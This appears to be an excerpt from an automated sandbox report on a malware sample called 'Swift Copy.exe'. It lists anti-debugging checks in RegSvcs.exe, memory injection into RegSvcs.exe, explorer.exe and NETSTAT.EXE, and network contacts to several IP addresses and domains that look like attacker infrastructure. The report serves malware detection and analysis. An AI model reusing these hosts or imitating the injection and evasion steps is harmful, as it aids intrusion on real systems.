Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h] 8_2_01904A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01954257 mov eax, dword ptr fs:[00000030h] 8_2_01954257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h] 8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198EA55 mov eax, dword ptr fs:[00000030h] 8_2_0198EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190927A mov eax, dword ptr fs:[00000030h] 8_2_0190927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h] 8_2_0197B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h] 8_2_0197B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998A62 mov eax, dword ptr fs:[00000030h] 8_2_01998A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h] 8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h] 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h] 8_2_018FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h] 8_2_018FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F35A1 mov eax, dword ptr fs:[00000030h] 8_2_018F35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019905AC mov eax, dword ptr fs:[00000030h] 8_2_019905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019905AC mov eax, dword ptr fs:[00000030h] 8_2_019905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h] 8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h] 8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h] 8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov ecx, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h] 8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01978DF1 mov eax, dword ptr fs:[00000030h] 8_2_01978DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h] 8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h] 8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h] 8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198E539 mov eax, dword ptr fs:[00000030h] 8_2_0198E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0194A537 mov eax, dword ptr fs:[00000030h] 8_2_0194A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998D34 mov eax, dword ptr fs:[00000030h] 8_2_01998D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h] 8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h] 8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h] 8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAD30 mov eax, dword ptr fs:[00000030h] 8_2_018CAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01903D43 mov eax, dword ptr fs:[00000030h] 8_2_01903D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943540 mov eax, dword ptr fs:[00000030h] 8_2_01943540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01973D40 mov eax, dword ptr fs:[00000030h] 8_2_01973D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E7D50 mov eax, dword ptr fs:[00000030h] 8_2_018E7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h] 8_2_018EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h] 8_2_018EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D849B mov eax, dword ptr fs:[00000030h] 8_2_018D849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998CD6 mov eax, dword ptr fs:[00000030h] 8_2_01998CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019814FB mov eax, dword ptr fs:[00000030h] 8_2_019814FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h] 8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h] 8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h] 8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h] 8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h] 8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h] 8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FBC2C mov eax, dword ptr fs:[00000030h] 8_2_018FBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA44B mov eax, dword ptr fs:[00000030h] 8_2_018FA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h] 8_2_0195C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h] 8_2_0195C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E746D mov eax, dword ptr fs:[00000030h] 8_2_018E746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h] 8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h] 8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h] 8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D8794 mov eax, dword ptr fs:[00000030h] 8_2_018D8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019037F5 mov eax, dword ptr fs:[00000030h] 8_2_019037F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h] 8_2_018FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h] 8_2_018FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h] 8_2_0195FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h] 8_2_0195FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199070D mov eax, dword ptr fs:[00000030h] 8_2_0199070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199070D mov eax, dword ptr fs:[00000030h] 8_2_0199070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EF716 mov eax, dword ptr fs:[00000030h] 8_2_018EF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h] 8_2_018C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h] 8_2_018C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h] 8_2_018EB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h] 8_2_018EB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FE730 mov eax, dword ptr fs:[00000030h] 8_2_018FE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DEF40 mov eax, dword ptr fs:[00000030h] 8_2_018DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DFF60 mov eax, dword ptr fs:[00000030h] 8_2_018DFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998F6A mov eax, dword ptr fs:[00000030h] 8_2_01998F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195FE87 mov eax, dword ptr fs:[00000030h] 8_2_0195FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019446A7 mov eax, dword ptr fs:[00000030h] 8_2_019446A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h] 8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h] 8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h] 8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F36CC mov eax, dword ptr fs:[00000030h] 8_2_018F36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998ED6 mov eax, dword ptr fs:[00000030h] 8_2_01998ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197FEC0 mov eax, dword ptr fs:[00000030h] 8_2_0197FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01908EC7 mov eax, dword ptr fs:[00000030h] 8_2_01908EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F16E0 mov ecx, dword ptr fs:[00000030h] 8_2_018F16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D76E2 mov eax, dword ptr fs:[00000030h] 8_2_018D76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h] 8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h] 8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h] 8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F8E00 mov eax, dword ptr fs:[00000030h] 8_2_018F8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981608 mov eax, dword ptr fs:[00000030h] 8_2_01981608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h] 8_2_018FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h] 8_2_018FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197FE3F mov eax, dword ptr fs:[00000030h] 8_2_0197FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CE620 mov eax, dword ptr fs:[00000030h] 8_2_018CE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h] 8_2_0198AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h] 8_2_0198AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D766D mov eax, dword ptr fs:[00000030h] 8_2_018D766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk, 8_2_019099A0
Source: C:\Users\user\Desktop\Swift Copy.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 103.92.235.55 80
Source: C:\Windows\explorer.exe Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe Network Connect: 103.67.235.120 80
Source: C:\Windows\explorer.exe Network Connect: 192.3.130.2 80
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80
Source: C:\Windows\explorer.exe Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe Network Connect: 51.159.175.169 80
Source: C:\Windows\explorer.exe Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe Domain query: www.expectedclosure.one
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 370000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
